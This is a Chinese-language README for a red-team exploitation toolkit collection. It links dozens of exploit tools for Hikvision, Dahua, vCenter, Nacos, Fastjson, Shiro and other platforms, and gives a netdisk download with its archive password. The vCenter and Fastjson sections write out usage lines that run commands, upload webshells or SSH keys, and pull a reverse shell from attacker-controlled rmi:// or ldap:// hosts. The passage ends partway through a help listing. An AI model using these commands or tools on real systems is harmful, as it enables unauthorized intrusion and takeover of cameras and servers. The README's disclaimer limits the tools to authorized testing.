├── README.md
├── VulToolsKit-V1.1一把梭漏洞利用工具合集.html
└── assets
├── image-20240627092425-33egjal.png
├── image-20240627092641-z11lhhg.png
├── image-20240627092704-luie0j9.png
├── image-20240627093029-rgwih84.png
├── image-20240627093039-hy5mms2.png
├── image-20240627093052-vlaj022.png
├── image-20240627093100-nm5ryus.png
├── image-20240627093105-rs0mp7q.png
├── image-20240627094033-t8q9zy8.png
├── image-20240627094041-c9nfwhn.png
├── image-20240627094050-the5fq1.png
├── image-20240627095322-zf9bpzu.png
├── image-20240627095433-z1d6prl.png
├── image-20240627101405-x3af9e7.png
├── image-20240627102006-4vbn0vg.png
├── image-20240627104833-9sown7s.png
├── image-20240627105040-78fliwh.png
├── image-20240627105705-su49pl9.png
├── image-20240627105833-30qtagk.png
├── image-20240627110852-l8sj81i.png
├── image-20240627111232-o0yu9hz.png
├── image-20240627112005-llx5b02.png
├── image-20240627112211-pznr73j.png
├── image-20240627120159-t5v1a60.png
├── image-20240627135442-l71fy4u.png
├── image-20240627135553-9ru7crz.png
├── image-20240627135620-r0s0fge.png
├── image-20240627140034-p4j08o0.png
├── image-20240627140100-p4fdeel.png
├── image-20240627140431-7i0plqs.png
├── image-20240627140732-5a1mfgs.png
├── image-20240627141452-r6kpkoo.png
├── image-20240627142612-xriy2tx.png
├── image-20240627143837-y5l0gsi.png
├── image-20240627144355-s3e1ix4.png
├── image-20240627144633-2abln9a.png
├── image-20240627145957-zcz22sx.png
├── image-20240627151424-u1j7xhx.png
├── image-20240627153035-qz8pjh6.png
├── image-20240627153943-1ajvqbh.png
├── image-20240627155236-lk8g7s3.png
├── image-20240627155326-pdu5b7r.png
├── image-20240627164850-vfxoylp.png
└── image-20240627171913-hl7u95d.png
/README.md:
--------------------------------------------------------------------------------
1 | # 目录
2 | 红队武器库VulToolsKit漏洞利用工具合集整理,解压密码:LightDream,欢迎关注公众号:浅梦安全
3 |
4 | V1.1下载链接:(因为文件太大了上传Github不太方便,所以就挂网盘了,)
5 |
6 | 夸克网盘「VulToolsKit漏洞利用工具合集.zip」链接:https://pan.quark.cn/s/59975ef47afa
7 |
8 | 百度网盘VulToolsKit漏洞利用工具合集.zip链接: 关注公众号:浅梦安全回复:VulToolsKitV1.1获取
9 |
10 | ```
11 | 海康威视Hikvision综合漏洞利用工具
12 | 大华Dahua综合漏洞利用工具
13 | Nacos综合漏洞利用工具
14 | Vcenter综合漏洞利用工具
15 | Fastjson漏洞批量检测工具
16 | Jenkins综合漏洞利用工具
17 | Struts2全版本漏洞检测工具
18 | Thinkphp综合漏洞利用工具
19 | Spring综合漏洞利用工具
20 | Shiro反序列化漏洞综合利用工具
21 | 若依RuoYi综合漏洞利用工具
22 | Xxl-job漏洞利用工具
23 | Jboss综合漏洞利用工具
24 | Weblogic综合漏洞利用工具
25 | Tomcat综合漏洞利用工具
26 | 帆软反序列化漏洞利用工具
27 | 云资产AK-SK利用管理工具
28 | Confluence综合漏洞利用工具
29 | 数据库综合利用工具
30 | DecryptTools综合加解密后渗透工具
31 | 互联网厂商API利用工具
32 | OA综合漏洞利用工具
33 | 综合漏洞利用工具
34 | Jeecg&Jeecg-boot框架漏洞利用工具
35 | ActiveMqRCE漏洞利用工具
36 | Geoserver漏洞利用工具
37 | Jumpserver漏洞利用工具
38 | 禅道漏洞综合利用工具
39 | Java漏洞利用工具
40 | 信息泄露利用工具
41 | Swagger API信息泄露利用工具
42 | Heapdump敏感信息提取工具
43 | .git泄漏利用工具
44 | SVN源代码利用工具
45 | .DS_Store文件泄露利用工具
46 | .cvs源代码泄露利用工具
47 | Webpack:安全检测的扫描工具
48 | ```
49 |
50 |
51 | ```
52 | 此合集所有工具都来源于互联网公开收集整理,请勿从事非法测试!!!
53 | 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。
54 | 利用此工具集而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与原作者及收集者无关。
55 | 该仅供安全人员用于授权测试,请勿非法使用!!!
56 | 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具集。
57 | 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
58 |
59 | 注:工具集有些工具杀软会报毒,请自行判断是否存在后门,收集作者未加入任何后门!!!,建议在本地虚拟机中使用。
60 | ```
61 |
62 | - 海康威视Hikvision综合漏洞利用工具
63 | - [MInggongK/Hikvision-: Hikvision综合漏洞利用工具 (github.com)](https://github.com/MInggongK/Hikvision-)
64 | - [charonlight/HikvisionExploitGUI: 海康威视漏洞综合利用工具(github.com)](https://github.com/charonlight/HikvisionExploitGUI)
65 | - [jorhelp/Ingram: 网络摄像头漏洞扫描工具 (github.com)](https://github.com/jorhelp/Ingram)
66 | - [Cuerz/CVE-2021-36260: 海康威视RCE漏洞 批量检测和利用工具 (github.com)](https://github.com/Cuerz/CVE-2021-36260)
67 | - [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor. (github.com)](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor)
68 | - 大华Dahua综合漏洞利用工具
69 | - [MInggongK/dahuaExploitGUI: dahua综合漏洞利用工具 (github.com)](https://github.com/MInggongK/dahuaExploitGUI)
70 | - [mcw0/DahuaConsole: Dahua Console. (github.com)](https://github.com/mcw0/DahuaConsole)
71 | - Nacos综合漏洞利用工具
72 | - [charonlight/NacosExploitGUI: Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用 (github.com)](https://github.com/charonlight/NacosExploitGUI)
73 | - [Conan924/NacosExploit: NacosExploit 命令执行 内存马等利用 (github.com)](https://github.com/Conan924/NacosExploit)
74 | - [h0ny/NacosExploit: Nacos 综合利用工具 (github.com)](https://github.com/h0ny/NacosExploit)
75 | - [p1d3er/GitNacosConfig: 一键获取Nacos所有配置文件 (github.com)](https://github.com/p1d3er/GitNacosConfig)
76 | - [HACK-THE-WORLD/nacos-poc (github.com)](https://github.com/HACK-THE-WORLD/nacos-poc)
77 | - Vcenter综合漏洞利用工具
78 | - [W01fh4cker/VcenterKit: Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit (github.com)](https://github.com/W01fh4cker/VcenterKit)
79 | - [Schira4396/VcenterKiller: 一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接 (github.com)](https://github.com/Schira4396/VcenterKiller)
80 | - Fastjson漏洞批量检测工具
81 | - [c0ny1/FastjsonExploit: Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架) (github.com)](https://github.com/c0ny1/FastjsonExploit)
82 | - [smallfox233/JsonExp: fastjson漏洞批量检测工具 (github.com)](https://github.com/smallfox233/JsonExp)
83 | - Jenkins综合漏洞利用工具
84 | - [TheBeastofwar/JenkinsExploit-GUI: 一款Jenkins的综合漏洞利用工具 (github.com)](https://github.com/TheBeastofwar/JenkinsExploit-GUI)
85 | - [charonlight/JenkinsExploitGUI: Jenkins CLI 任意文件读取漏洞检查工具 (github.com)](https://github.com/charonlight/JenkinsExploitGUI)
86 | - [convisolabs/CVE-2024-43044-jenkins: Exploit for the vulnerability CVE-2024-43044 in Jenkins (github.com)](https://github.com/convisolabs/CVE-2024-43044-jenkins)
87 | - Struts2全版本漏洞检测工具
88 | - [abc123info/Struts2VulsScanTools: 自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021、S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。 (github.com)](https://github.com/abc123info/Struts2VulsScanTools)
89 | - [shack2/Struts2VulsTools: Struts2系列漏洞检查工具 (github.com)](https://github.com/shack2/Struts2VulsTools)
90 | - Thinkphp综合漏洞利用工具
91 | - [Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (github.com)](https://github.com/Lotus6/ThinkphpGUI)
92 | - [bewhale/thinkphp_gui_tools: ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过 (github.com)](https://github.com/bewhale/thinkphp_gui_tools)
93 | - [zangcc/Aazhen-RexHa: 漏洞POC基本适用ThinkPHP全版本漏洞。 (github.com)](https://github.com/zangcc/Aazhen-RexHa)
94 | - Spring综合漏洞利用工具
95 | - [charonlight/SpringExploitGUI: 一款Spring综合漏洞的利用工具,工具支持多个Spring相关漏洞的检测以及利用 (github.com)](https://github.com/charonlight/SpringExploitGUI)
96 | - [0x727/SpringBootExploit: 项目是根据LandGrey/SpringBootVulExploit清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。 (github.com)](https://github.com/0x727/SpringBootExploit)
97 | - [SummerSec/SpringExploit: 🚀 一款为了学习go而诞生的漏洞利用工具 (github.com)](https://github.com/SummerSec/SpringExploit)
98 | - [savior-only/Spring_All_Reachable: Spring漏洞综合利用工具 (github.com)](https://github.com/savior-only/Spring_All_Reachable)
99 | - Shiro反序列化漏洞综合利用工具
100 | - [SummerSec/ShiroAttack2: shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack](https://github.com/SummerSec/ShiroAttack2)
101 | - [sma11new/Pyke-Shiro: 复杂请求下的Shiro反序列化利用工具 (github.com)](https://github.com/sma11new/Pyke-Shiro)
102 | - [altEr1125/ShiroAttack2: 一款针对Shiro550漏洞进行快速漏洞利用工具。 对 @SummerSec 大佬的项目https://github.com/SummerSec/ShiroAttack2 进行了一些改进。](https://github.com/altEr1125/ShiroAttack2)
103 | - [safe6Sec/ShiroExp: shiro综合利用工具 (github.com)](https://github.com/safe6Sec/ShiroExp)
104 | - [wyzxxz/shiro_rce_tool: shiro 反序列 命令执行辅助检测工具 (github.com)](https://github.com/wyzxxz/shiro_rce_tool)
105 | - [feihong-cs/ShiroExploit-Deprecated: Shiro550/Shiro721 一键化利用工具,支持多种回显方式 (github.com)](https://github.com/feihong-cs/ShiroExploit-Deprecated)
106 | - 若依RuoYi综合漏洞利用工具
107 | - [若依漏洞综合利用工具 (qq.com)](https://mp.weixin.qq.com/s/HU1OqZ7YFGjfc4HE3M8tPA)
108 | - [charonlight/RuoYiExploitGUI: 若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具 (github.com)](https://github.com/charonlight/RuoYiExploitGUI)
109 | - Xxl-job漏洞利用工具
110 | - [charonlight/xxl-jobExploitGUI: xxl-job最新漏洞利用工具 (github.com)](https://github.com/charonlight/xxl-jobExploitGUI)
111 | - Jboss综合漏洞利用工具
112 | - [https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ](https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ)
113 | - [https://github.com/fupinglee/JavaTools/tree/master/JBoss](https://github.com/fupinglee/JavaTools/tree/master/JBoss)
114 | - Weblogic综合漏洞利用工具
115 | - [KimJun1010/WeblogicTool: WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动) (github.com)](https://github.com/KimJun1010/WeblogicTool)
116 | - Tomcat综合漏洞利用工具
117 | - [tpt11fb/AttackTomcat: Tomcat常见漏洞GUI利用工具。CVE-2017-12615 PUT文件上传漏洞、tomcat-pass-getshell 弱认证部署war包、弱口令爆破、CVE-2020-1938 Tomcat AJP文件读取/包含 (github.com)](https://github.com/tpt11fb/AttackTomcat)
118 | - [errors11/TomcatVuln: Tomcat漏洞利用工具 (github.com)](https://github.com/errors11/TomcatVuln)
119 | - 帆软反序列化漏洞利用工具
120 | - [7wkajk/Frchannel: 帆软bi反序列化漏洞利用工具 (github.com)](https://github.com/7wkajk/Frchannel)
121 | - [BambiZombie/FrchannelPlus: 帆软bi反序列化漏洞利用工具 (github.com)](https://github.com/BambiZombie/FrchannelPlus)
122 | - 云资产AK-SK利用管理工具
123 | - [dark-kingA/cloudTools: 云资产管理工具 目前工具定位是云安全相关工具,目前是两个模块 云存储工具、云服务工具, 云存储工具主要是针对oss存储、查看、删除、上传、下载、预览等等 云服务工具主要是针对rds、服务器的管理,查看、执行命令、接管等等 (github.com)](https://github.com/dark-kingA/cloudTools)
124 | - [jdr2021/OSSFileBrowse: 存储桶遍历漏洞利用工具 (github.com)](https://github.com/jdr2021/OSSFileBrowse)
125 | - [CF 云环境利用框架使用手册 | T Wiki (teamssix.com)](https://wiki.teamssix.com/cf/)
126 | - [mrknow001/aliyun-accesskey-Tools: 阿里云accesskey利用工具 (github.com)](https://github.com/mrknow001/aliyun-accesskey-Tools)
127 | - Confluence综合漏洞利用工具
128 | - [Lotus6/ConfluenceMemshell: Confluence CVE 2021,2022,2023 利用工具,支持命令执行,哥斯拉,冰蝎 内存马注入 (github.com)](https://github.com/Lotus6/ConfluenceMemshell)
129 | - 数据库综合利用工具
130 | - [SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools (github.com)](https://github.com/SafeGroceryStore/MDUT)
131 | - [team-ide/teamide: Team IDE 集成MySql、Oracle、金仓、达梦、神通等数据库、SSH、FTP、Redis、Zookeeper、Kafka、Elasticsearch、Mongodb、小工具等管理工具 (github.com)](https://github.com/team-ide/teamide)
132 | - [r0oth3x49/ghauri: An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws (github.com)](https://github.com/r0oth3x49/ghauri)
133 | - [攻防演练工具 | Oracle数据库getshell的另一种思路 - FreeBuf网络安全行业门户](https://www.freebuf.com/defense/405383.html)
134 | - [DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend(扩展版本) (github.com)](https://github.com/DeEpinGh0st/MDUT-Extend-Release)
135 | - [Release v1.0.7 · 1n7erface/Template (github.com)](https://github.com/1n7erface/Template/releases/tag/v1.0.7)
136 | - [jas502n/oracleShell: oracle 数据库命令执行 (github.com)](https://github.com/jas502n/oracleShell)
137 | - [PostgreUtil数据库利用工具](https://mp.weixin.qq.com/s/0s6CTAjwd5-qN6IxupwC9w)
138 | - DecryptTools综合加解密后渗透工具
139 | - [wafinfo/DecryptTools: DecryptTools-综合解密 (github.com)](https://github.com/wafinfo/DecryptTools)
140 | - 互联网厂商API利用工具
141 | - [pykiller/API-T00L: 互联网厂商API利用工具。 (github.com)](https://github.com/pykiller/API-T00L)
142 | - [mrknow001/API-Explorer: API接口管理工具(目前内置微信公众号、微信小程序、企业微信、飞书、钉钉等) (github.com)](https://github.com/mrknow001/API-Explorer)
143 | - OA综合漏洞利用工具
144 | - [MInggongK/Penetration-mining-src: 一款集成了H3C,致远,泛微,万户,帆软,海康威视,金蝶云星空,畅捷通,Struts等多个RCE漏洞利用工具 (github.com)](https://github.com/MInggongK/Penetration-mining-src)
145 | - [R4gd0ll/I-Wanna-Get-All: OA漏洞利用工具 (github.com)](https://github.com/R4gd0ll/I-Wanna-Get-All)
146 | - [achuna33/MYExploit: OAExploit一款基于产品的一键扫描工具。 (github.com)](https://github.com/achuna33/MYExploit)
147 | - [琴音安全红蓝对抗重点OA系统漏洞利用工具](https://mp.weixin.qq.com/s/1MEkYv5A47DJLCKqXKT0zQ)
148 | - [xiaokp7/TongdaOATool: 通达OA漏洞检测工具 (github.com)](https://github.com/xiaokp7/TongdaOATool)
149 | - [cseroad/Exp-Tools: 一款集成高危漏洞exp的实用性工具 (github.com)](https://github.com/cseroad/Exp-Tools)
150 | - [wgpsec/YongYouNcTool: 用友NC系列漏洞检测利用工具,支持一键检测、命令执行回显、文件落地、一键打入内存马、文件读取等 (github.com)](https://github.com/wgpsec/YongYouNcTool)
151 | - [Chave0v0/YONYOU-TOOL: 用友漏洞综合利用工具 (github.com)](https://github.com/Chave0v0/YONYOU-TOOL)
152 | - [White-hua/Apt_t00ls: 高危漏洞利用工具 (github.com)](https://github.com/White-hua/Apt_t00ls)
153 | - [ExpLangcn/HVVExploitApply: 遵守规章制度关闭项目-使用JAVAFX图形化界面检测对HVV中常见的重点CMS系统和OA系统的已公开的漏洞进行验证。 (github.com)](https://github.com/ExpLangcn/HVVExploitApply)
154 | - [lijiaxing1997/Gr33k: 图形化漏洞利用集成工具 (github.com)](https://github.com/lijiaxing1997/Gr33k)
155 | - 综合漏洞利用工具
156 | - [pureqh/Hyacinth: 一款java漏洞集合工具 (github.com)](https://github.com/pureqh/Hyacinth)
157 | - [qianxiao996/FrameScan-GUI: FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架。 (github.com)](https://github.com/qianxiao996/FrameScan-GUI)
158 | - [f0ng/poc2jar: Java编写,Python作为辅助依赖的漏洞验证、利用工具,添加了进程查找模块、编码模块、命令模块、常见漏洞利用GUI模块、shiro rememberMe解密模块,加快测试效率 (github.com)](https://github.com/f0ng/poc2jar)
159 | - [Liqunkit/LiqunKit_: 下架 (github.com)](https://github.com/Liqunkit/LiqunKit_)
160 | - Jeecg&Jeecg-boot框架漏洞利用工具
161 | - [K-7H7l/Jeecg_Tools: 本工具为jeecg框架漏洞利用工具非jeecg-boot! (github.com)](https://github.com/K-7H7l/Jeecg_Tools)
162 | - [MInggongK/jeecg-: jeecg综合漏洞利用工具 (github.com)](https://github.com/MInggongK/jeecg-)
163 | - ActiveMqRCE漏洞利用工具
164 | - [Hutt0n0/ActiveMqRCE: 用java实现构造openwire协议,利用activeMQ < 5.18.3 RCE 回显利用 内存马注入 (github.com)](https://github.com/Hutt0n0/ActiveMqRCE)
165 | - Geoserver漏洞利用工具
166 | - [GeoServer 综合漏洞扫描工具V1.2 发布! (qq.com)](https://mp.weixin.qq.com/s/2MjsLXM8wXRRl1PhXOfAig)
167 | - Jumpserver漏洞利用工具
168 | - [tarihub/blackjump: JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021 (github.com)](https://github.com/tarihub/blackjump)
169 | - 禅道漏洞综合利用工具
170 | - [charonlight/ZentaoExploitGUI: 禅道最新身份认证绕过漏洞利用工具 (github.com)](https://github.com/charonlight/ZentaoExploitGUI)
171 | - Java漏洞利用工具
172 | - [welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(github.com)](https://github.com/welk1n/JNDI-Injection-Exploit)
173 | - [qi4L/JYso: It can be either a JNDIExploit or a ysoserial. (github.com)](https://github.com/qi4L/JYso)
174 | - [cckuailong/JNDI-Injection-Exploit-Plus: 80+ Gadgets(30 More than ysoserial). 一款JNDI注入利用工具,可以生成JNDI链接并启动后端相关服务。. (github.com)](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus?tab=readme-ov-file)
175 | - [frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)](https://github.com/frohoff/ysoserial)
176 | - [Y4er/ysoserial: ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。 (github.com)](https://github.com/Y4er/ysoserial)
177 | - [frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)](https://github.com/frohoff/ysoserial)
178 | - 信息泄露利用工具
179 | - Swagger API信息泄露利用工具
180 | - [jayus0821/swagger-hack: 自动化爬取并自动测试所有swagger接口 (github.com)](https://github.com/jayus0821/swagger-hack)
181 | - [lijiejie/swagger-exp: A Swagger API Exploit (github.com)](https://github.com/lijiejie/swagger-exp)
182 | - Heapdump敏感信息提取工具
183 | - [wyzxxz/heapdump_tool: heapdump敏感信息查询工具,例如查找 spring heapdump中的密码明文,AK,SK等 (github.com)](https://github.com/wyzxxz/heapdump_tool)
184 | - [whwlsfb/JDumpSpider: HeapDump敏感信息提取工具 (github.com)](https://github.com/whwlsfb/JDumpSpider)
185 | - .git泄漏利用工具
186 | - [BugScanTeam/GitHack: .git 泄漏利用工具,可还原历史版本 (github.com)](https://github.com/BugScanTeam/GitHack)
187 | - SVN源代码利用工具
188 | - [admintony/svnExploit: SvnExploit支持SVN源代码泄露全版本Dump源码 (github.com)](https://github.com/admintony/svnExploit)
189 | - .DS_Store文件泄露利用工具
190 | - [lijiejie/ds_store_exp: A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively. (github.com)](https://github.com/lijiejie/ds_store_exp)
191 | - .cvs源代码泄露利用工具
192 | - [kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG... (github.com)](https://github.com/kost/dvcs-ripper)
193 | - Webpack:安全检测的扫描工具
194 | - [zangcc/Aakian-FaCai: 基于前端vue框架的JavaFx图形化GUI漏洞扫描工具。 (github.com)](https://github.com/zangcc/Aakian-FaCai)
195 | - [rtcatc/Packer-Fuzzer: Packer Fuzzer is a fast and efficient scanner for security detection of websites constructed by javascript module bundler such as Webpack. (github.com)](https://github.com/rtcatc/Packer-Fuzzer)
196 |
197 | # 海康威视 Hikvision 综合漏洞利用工具
198 |
199 | ## 项目地址
200 |
201 | ```
202 | https://github.com/MInggongK/Hikvision-
203 | ```
204 |
205 | ## 项目介绍
206 |
207 | ```
208 | 海康威视综合漏洞利用工具 收录漏洞如下:
209 | Hikvision 摄像头未授权访问漏洞
210 | Hikvision 远程代码执行漏洞
211 | Hikvision iVMS综合安防系统任意文件上传漏洞
212 | Hikvision综合安防管理平台isecure center文件上传漏洞
213 | Hikvision综合安防管理平台config信息泄露漏洞
214 | Hikvision综合安防管理平台env信息泄漏漏洞
215 | Hikvision综合安防管理平台report任意文件上传漏洞
216 | Hikvision综合安防管理平台api session命令执行漏洞
217 | Hikvision applyCT命令执行漏洞
218 | Hikvision applyAutoLoginTicket命令执行漏洞
219 | Hikvision keepAlive远程代码执行漏洞
220 | Hikvision综合安防管理平台orgManage任意文件读取漏洞
221 | Hikvision综合安防管理平台files任意文件读取漏洞
222 | ```
223 |
224 | 
225 |
226 | # Dahua 综合漏洞利用工具
227 |
228 | ## 项目地址
229 |
230 | ```
231 | https://github.com/MInggongK/dahuaExploitGUI
232 | ```
233 |
234 | ## 项目介绍
235 |
236 | ```
237 | Dhua综合漏洞利用工具 收录漏洞如下:
238 |
239 | 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞
240 | 大华DSS数字监控系统远程命令执行漏洞
241 | 大华DSS数字监控系统itcBulletin注入漏洞
242 | 大华智慧园区综合管理平台信息泄露漏洞
243 | 大华智慧园区综合管理平台getNewStaypointDetailQuery注入漏洞
244 | 大华智慧园区综合管理平台clientserver注入
245 | 大华DSS user_edit.action信息泄露漏洞
246 | 大华智慧园区综合管理平台poi任意文件上传漏洞
247 | 大华智慧园区综合管理平台video任意文件上传漏洞
248 | 大华智慧园区综合管理平台emap任意文件上传漏洞
249 | 大华智慧园区综合管理平台searchJson注入漏洞
250 | 大华DSS数字监控系统attachment_getAttList.action注入漏洞
251 | 大华智能物联综合管理平台justForTest用户登录漏洞
252 | 大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞
253 | 大华智慧园区综合管理平台deleteFtp远程命令执行漏洞
254 | 大华EIMS-capture_handle远程命令执行漏洞
255 | 大华智能物联综合管理平台random远程命令执行漏洞
256 | 大华智慧园区综合管理平台ipms命令执行漏洞
257 | ```
258 |
259 | 
260 |
261 | 
262 |
263 | # Nacos 综合漏洞利用工具
264 |
265 | ## 项目地址
266 |
267 | ```
268 | https://github.com/charonlight/NacosExploitGUI
269 | ```
270 |
271 | ## 项目介绍
272 |
273 | ```
274 | 集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用
275 | ```
276 |
277 | 
278 |
279 | 
280 |
281 | 
282 |
283 | 
284 |
285 | 
286 |
287 | # Vcenter 综合漏洞利用工具
288 |
289 | ## 项目地址
290 |
291 | ```
292 | https://github.com/Schira4396/VcenterKiller
293 | ```
294 |
295 | ```
296 | https://github.com/W01fh4cker/VcenterKit
297 | ```
298 |
299 | ## 项目介绍
300 |
301 | ```
302 | 一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接
303 |
304 | go build -o main.exe
305 |
306 | ./main.exe -u https://192.168.1.1 -m 21985 -c whoami
307 | ./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
308 | ./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
309 | ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥
310 | ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
311 | ./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j
312 | ./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务
313 | ./main.exe -u https://xx.xx.com -m 22954 whoami
314 | ./main.exe -u https://xx.xx.com -m 22972 //get cookie
315 | ./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656
316 | ```
317 |
318 | ```
319 | Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit包含
320 |
321 | 信息收集模块
322 | CVE-2021-21972模块
323 | CVE-2021-21985模块
324 | CVE-2021-22005模块
325 | CVE-2022-22954模块
326 | CVE-2022-22972模块
327 | 后渗透利用模块
328 | 渗透测试记事本(打vcenter的时候常用的命令、常看的文章)
329 | ```
330 |
331 | 
332 |
333 | 
334 |
335 | 
336 |
337 | # Fastjson 漏洞批量检测工具
338 |
339 | ## 项目地址
340 |
341 | ```
342 | https://github.com/c0ny1/FastjsonExploit
343 | ```
344 |
345 | ```
346 | https://github.com/smallfox233/JsonExp
347 | ```
348 |
349 | ## 项目介绍
350 |
351 | ```
352 | FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:
353 |
354 | 一键生成利用payload,并启动所有利用环境。
355 | 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)
356 |
357 |
358 | .---- -. -. . . .
359 | ( .',----- - - ' '
360 | \_/ ;--:-\ __--------------------__
361 | __U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| |
362 | c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
363 | ,_\___________'_|,L______],|______________________|
364 | /;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o)
365 |
366 | FastjsonExploit is a Fastjson library vulnerability exploit framework
367 | Author:c0ny1
368 |
369 |
370 | Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
371 | Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
372 | Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
373 | Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
374 | Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"
375 |
376 | Available payload types:
377 | Payload PayloadType VulVersion Dependencies
378 | ------- ----------- ---------- ------------
379 | BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
380 | BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
381 | JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4
382 | JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass
383 | JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass
384 | JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass
385 | JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass
386 | JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0
387 | SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE
388 | TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
389 | TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)
390 | ```
391 |
392 | ```
393 | 1. 根据现有payload,检测目标是否存在fastjson或jackson漏洞(工具仅用于检测漏洞、定位payload)
394 | 2. 若存在漏洞,可根据对应payload进行后渗透利用
395 | 3. 若出现新的漏洞时,可将最新的payload新增至txt中(需修改格式)
396 | 4. 工具无法完全替代手工检测,仅作为辅助工具使用
397 | JsonExp.exe -h
398 | usage: -u [目标] -l [LDAP地址]
399 | usage: -uf [url.txt] -l [LDAP地址]
400 | usage: -req [request.txt] -l [LDAP地址]
401 |
402 | [-h] [-uf URLFILE] [-u URL] [-req REQUEST] [-to TIMEOUT] [-f FILE] [-t TYPE] [-c COOKIE] [-l LDAP] [-r RMI]
403 | [-pro PROTOCOL] [-proxy PROXY]
404 |
405 | 功能:批量检测是否存在fastjson/jackson漏洞(未使用-f时,默认检测fastjson)
406 |
407 | optional arguments:
408 | -h, --help show this help message and exit
409 | -uf URLFILE, --urlfile URLFILE
410 | [可选] 指定批量目标(文本路径)
411 | -u URL, --url URL [可选] 指定目标
412 | -req REQUEST, --request REQUEST
413 | [可选] 指定请求包,默认为http协议发送请求
414 | -to TIMEOUT, --timeout TIMEOUT
